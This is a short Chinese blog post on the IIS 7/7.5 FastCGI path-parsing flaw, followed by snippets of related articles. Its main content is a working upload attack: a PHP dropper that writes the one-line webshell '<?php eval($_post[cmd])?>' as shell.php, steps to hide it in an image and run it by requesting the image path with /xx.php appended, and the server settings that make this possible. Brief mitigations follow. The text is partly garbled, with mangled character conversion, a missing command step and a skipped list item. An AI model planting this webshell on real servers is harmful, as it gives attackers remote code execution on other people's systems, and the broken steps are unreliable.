IIS7 7 5解析漏洞

2021-06-22 15:46:46 字數 1016 閱讀 3631

iis7/7.5在fast-cgi執行模式下,在乙個檔案路徑(/xx.jpg)後面加上/xx.php會將/xx.jpg/xx.php 解析為 php 檔案。

/b 即二進位制[binary]模式

/a 即ascii模式 xx.jpg正常檔案

yy.txt 內容 <?phpfputs (fopen('shell.php','w'),'<?php eval($_post[cmd])?>');?>

意思為寫入乙個內容為 <?php eval($_post[cmd])?> 名稱為shell.php的檔案

找個地方上傳 xy.jpg ,然後找到 xy.jpg 的位址,在位址後加上 /xx.php 即可執行惡意文字。

然後就在目錄下生成一句話木馬 shell.php 密碼 cmd

注意:

該解析漏洞利用需兩個條件:

1.        php.ini裡cgi.fix_pathinfo=1(預設為1)

解決方案:

1.      配置cgi.pathinfo(php.ini中)為0並重啟php-cgi程式

3.      重新配置iis,使用isapi的方式(注意:php5.3.1已經不支援isapi方式)。

iis7 7 5設定上傳檔案最大大小

本編今天接到乙個客戶的修改,說乙個68m的pdf檔案上傳不上去,但是我本地開啟斷點除錯了好幾遍,都沒有問題,能正常上傳檔案,由此確定不是 問題。然後我試著上傳5m左右的pdf卻能正常的上傳,然後上傳10m的pdf依然沒有問題。於是我確定是 限制了檔案最大上傳大小,然後我試著在web.config加上...

IIS解析漏洞復現

該解析漏洞形成原因是以 asp命名的資料夾裡面的檔案都會被當作asp檔案解析!首先我們先搭建乙個iis6.0的伺服器,具體搭建方法見文章中還有一些常見的問題也幫大家寫出來了。然後我們建立乙個test.txt的文件裡面寫入hello world,然後修改字尾名將test.txt改為test.jpg 然...

IIS6 0和IIS7 0解析漏洞

目錄iis7.0 7.5解析漏洞 參考環境搭建 目錄解析漏洞 在iis6.0中,目錄中以 asp命名的資料夾下的檔案將會被以asp格式解析 我們先建立乙個txt檔案,新增helloworld內容,隨後將其更改為.jpg格式 在 目錄下訪問1.jpg檔案,該檔案是以jpg檔案解析 訪問以 asp命名的...